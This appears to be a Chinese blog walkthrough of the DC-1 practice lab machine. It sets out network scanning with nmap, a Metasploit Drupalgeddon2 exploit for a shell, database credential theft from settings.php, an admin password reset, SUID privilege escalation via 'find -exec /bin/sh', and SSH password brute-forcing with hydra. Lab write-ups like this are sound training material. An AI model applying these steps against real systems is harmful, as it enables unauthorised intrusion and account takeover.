DC1渗透

  • kail虚拟机ip为
    在这里插入图片描述
  • nmap -sP 192.168.72.197/24 扫描本网段存活主机

在这里插入图片描述

  • nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本
    在这里插入图片描述
    发现靶机开放ssh服务和http服务
  • 尝试访问http服务
    在这里插入图片描述
  • 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统
  • 用MSF search一下该CMS已知的漏洞
    在这里插入图片描述
  • 启动msf(mfsconsole)
    在这里插入图片描述
  • 漏洞利用
    • 有很多可以使用的模块,选择一个最新的模块进行利用
    • use exploit/unix/webapp/drupal_drupalgeddon2
    • 设置目标IP地址 set RHOST 192.168.72.198
    • 利用该模块进行攻击 exploit,可以成功获取目标靶机的 shell
    • 成功拿到shell
      在这里插入图片描述
  • 拿到shell,用户权限为 www-data
    在这里插入图片描述
  • 利用python反弹shell
    在这里插入图片描述
    理解这段英语,提示需要提升权限为root权限
  • 继续在站点路径下寻找敏感文件
    在这里插入图片描述
    这段英语提示寻找站点的配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php
  • 在这里发现flag2和数据库账号和密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破
    在这里插入图片描述
  • 进入数据库,查看
    在这里插入图片描述
  • 找Drupal user 表,发现admin用户,并退出mysql
    在这里插入图片描述
  • 置换drupal密码,阅读此文章http://drupalchina.cn/node/2128
php scripts/password-hash.sh 123456

在这里插入图片描述

  • 重新进入mysql,进入到drupaldb表中,置换密码
    在这里插入图片描述
  • 此时数据库中账号为admin,密码为123456,用次账号登录网址,进入网站,在网站中查找有用信息
    在这里插入图片描述
  • 在网站目录content里面找到flag3的提示
    在这里插入图片描述
  • flag3中有提示,使用find命令,并提示 -exec,是suid提权在这里插入图片描述
find / -perm -4000 2>/dev/null

这行命令不懂可以先跳过,后面给出三篇文章,阅读之后可以看懂这行命令,初学看懂就行,不需要深究,太耗费精力。
find /
-perm -4000
2>/dev/null

  • 在网站站点路径下,使用命令测试,发现为root权限
touch 666
find / -name 666 -exec "whoami" \;
find / -name 666 -exec "whoami" \;find / -name 666 -exec "/bin/sh" \;  

在这里插入图片描述

  • 到这个地方渗透是成功了,但是还有登陆终端的账号和密码,使用爆破的方法
    查看 /etc/passwd 文件,发现存在 flag4 用户,可以使用hydra + John the Ripper的密码本,进行爆破进行。
    在这里插入图片描述
  • John the Ripper需要自己安装,参考这个文章安装john
hydra -l flag4 -P /root/桌面/john-1.8.0/run/password.lst  ssh://192.168.72.198 

在这里插入图片描述
密码为:orange

  • 登陆终端
    在这里插入图片描述
    在这里插入图片描述
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值